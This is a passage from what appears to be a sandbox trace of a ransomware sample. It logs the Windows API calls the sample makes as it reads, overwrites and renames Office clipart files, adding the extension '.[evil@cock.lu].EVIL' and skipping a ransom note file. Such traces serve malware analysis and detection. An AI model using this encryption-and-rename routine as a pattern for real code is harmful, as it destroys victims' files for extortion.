Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.231] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c8, lpOverlapped=0x0) returned 1 [0115.237] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.237] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.237] _errno () returned 0x84b1160840 [0115.237] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.237] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2e0, lpOverlapped=0x0) returned 1 [0115.238] CloseHandle (hObject=0x1a8) returned 1 [0115.238] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.238] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.238] __uncaught_exception () returned 0x84b1160800 [0115.238] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.239] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf.[evil@cock.lu].evil")) returned 1 [0115.239] ??_V@YAXPEAX@Z () returned 0x1 [0115.242] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF", dwFileAttributes=0x200) returned 0 [0115.242] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.242] wcsstr (_Str="DD00437_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.242] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 69 [0115.242] wcscmp (_String1="DD00437_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.242] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00437_.WMF") returned 0x0 [0115.242] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 0x45 [0115.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.244] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x78c, lpOverlapped=0x0) returned 1 [0115.250] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.250] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.250] _errno () returned 0x84b1160840 [0115.250] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.250] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a0, lpOverlapped=0x0) returned 1 [0115.250] CloseHandle (hObject=0x1a8) returned 1 [0115.251] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.251] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.251] __uncaught_exception () returned 0x84b1160800 [0115.251] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.251] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf.[evil@cock.lu].evil")) returned 1 [0115.252] ??_V@YAXPEAX@Z () returned 0x1 [0115.254] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF", dwFileAttributes=0x200) returned 0 [0115.255] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.255] wcsstr (_Str="DD00448_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.255] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 69 [0115.255] wcscmp (_String1="DD00448_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.255] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00448_.WMF") returned 0x0 [0115.255] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 0x45 [0115.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.257] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb88, lpOverlapped=0x0) returned 1 [0115.315] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.315] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.315] _errno () returned 0x84b1160840 [0115.315] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.315] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xba0, lpOverlapped=0x0) returned 1 [0115.316] CloseHandle (hObject=0x1a8) returned 1 [0115.316] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.316] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.316] __uncaught_exception () returned 0x84b1160800 [0115.316] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.316] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf.[evil@cock.lu].evil")) returned 1 [0115.317] ??_V@YAXPEAX@Z () returned 0x1 [0115.758] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF", dwFileAttributes=0x200) returned 0 [0115.758] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.758] wcsstr (_Str="DD00449_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.758] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 69 [0115.758] wcscmp (_String1="DD00449_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.758] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00449_.WMF") returned 0x0 [0115.758] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 0x45 [0115.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.760] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2708, lpOverlapped=0x0) returned 1 [0115.782] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.782] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.782] _errno () returned 0x84b1160840 [0115.782] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.782] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2720, lpOverlapped=0x0) returned 1 [0115.783] CloseHandle (hObject=0x1a8) returned 1 [0115.783] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.783] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.783] __uncaught_exception () returned 0x84b1160800 [0115.783] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.783] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf.[evil@cock.lu].evil")) returned 1 [0115.784] ??_V@YAXPEAX@Z () returned 0x1 [0115.788] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF", dwFileAttributes=0x200) returned 0 [0115.788] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.788] wcsstr (_Str="DD00687_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.788] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 69 [0115.788] wcscmp (_String1="DD00687_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.788] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00687_.WMF") returned 0x0 [0115.788] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 0x45 [0115.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.790] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5130, lpOverlapped=0x0) returned 1 [0115.818] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.818] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.818] _errno () returned 0x84b1160840 [0115.818] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.818] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5140, lpOverlapped=0x0) returned 1 [0115.818] CloseHandle (hObject=0x1a8) returned 1 [0115.818] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.819] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.819] __uncaught_exception () returned 0x84b1160800 [0115.819] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.819] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf.[evil@cock.lu].evil")) returned 1 [0115.820] ??_V@YAXPEAX@Z () returned 0x1 [0115.822] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF", dwFileAttributes=0x200) returned 0 [0115.822] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.822] wcsstr (_Str="DD00705_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.822] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 69 [0115.822] wcscmp (_String1="DD00705_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.822] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD00705_.WMF") returned 0x0 [0115.822] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 0x45 [0115.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.824] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x600c, lpOverlapped=0x0) returned 1 [0115.830] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.830] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.830] _errno () returned 0x84b1160840 [0115.830] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.830] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x6020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6020, lpOverlapped=0x0) returned 1 [0115.830] CloseHandle (hObject=0x1a8) returned 1 [0115.830] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.830] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.830] __uncaught_exception () returned 0x84b1160800 [0115.830] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.831] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf.[evil@cock.lu].evil")) returned 1 [0115.831] ??_V@YAXPEAX@Z () returned 0x1 [0115.834] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF", dwFileAttributes=0x200) returned 0 [0115.835] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.835] wcsstr (_Str="DD01015_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.835] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 69 [0115.835] wcscmp (_String1="DD01015_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.835] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01015_.WMF") returned 0x0 [0115.835] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 0x45 [0115.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.836] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b2, lpOverlapped=0x0) returned 1 [0115.839] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.839] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.839] _errno () returned 0x84b1160840 [0115.839] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.839] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0115.840] CloseHandle (hObject=0x1a8) returned 1 [0115.840] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.840] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.840] __uncaught_exception () returned 0x84b1160800 [0115.840] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.840] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf.[evil@cock.lu].evil")) returned 1 [0115.841] ??_V@YAXPEAX@Z () returned 0x1 [0115.844] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF", dwFileAttributes=0x200) returned 0 [0115.844] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.844] wcsstr (_Str="DD01039_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.844] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 69 [0115.844] wcscmp (_String1="DD01039_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.844] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01039_.WMF") returned 0x0 [0115.844] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 0x45 [0115.844] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.846] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x39e4, lpOverlapped=0x0) returned 1 [0115.849] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.849] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.849] _errno () returned 0x84b1160840 [0115.849] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.849] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a00, lpOverlapped=0x0) returned 1 [0115.849] CloseHandle (hObject=0x1a8) returned 1 [0115.849] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.850] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.850] __uncaught_exception () returned 0x84b1160800 [0115.850] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.850] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf.[evil@cock.lu].evil")) returned 1 [0115.851] ??_V@YAXPEAX@Z () returned 0x1 [0115.853] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF", dwFileAttributes=0x200) returned 0 [0115.854] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.895] wcsstr (_Str="DD01138_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.895] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 69 [0115.895] wcscmp (_String1="DD01138_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.895] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01138_.WMF") returned 0x0 [0115.895] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 0x45 [0115.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.897] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, 